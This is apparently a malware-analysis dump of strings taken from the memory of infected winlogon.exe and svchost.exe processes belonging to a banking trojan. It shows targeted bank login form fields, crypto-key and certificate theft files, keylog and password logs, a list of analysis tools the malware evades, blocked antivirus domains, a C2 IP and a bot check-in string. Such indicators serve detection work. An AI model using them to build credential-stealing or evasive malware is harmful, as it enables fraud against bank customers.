%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

winlogon.exe_416_rwx_00CA0000_000B9000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
SYSTEM!WINUK0FFOO83I6!427963A6
C:\Windows\apppatch\rkousid.exe
C:\Windows\system32\config\systemprofile\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
`.data
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_580_rwx_00B60000_00056000:

.text
`.data
.reloc
`.rdata
@.data
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_580_rwx_00C30000_00065000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
SYSTEM!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\rkousid.exe
C:\Windows\system32\config\systemprofile\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_648_rwx_00200000_00056000:

.text
`.data
.reloc
`.rdata
@.data
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
